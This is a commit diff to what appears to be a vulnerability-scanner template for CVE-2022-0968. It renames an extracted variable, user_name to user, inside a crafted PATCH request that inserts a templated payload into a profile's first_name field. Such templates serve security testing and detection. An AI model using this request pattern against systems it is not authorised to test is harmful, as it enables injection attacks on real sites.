Update CVE-2022-0968.yaml
parent
b85228d186
commit
6fb4609a5b
|
@ -37,7 +37,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user_name}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
|
||||
thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
|
@ -60,7 +60,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
part: body
|
||||
name: user_name
|
||||
name: user
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
|
|
Loading…
Reference in New Issue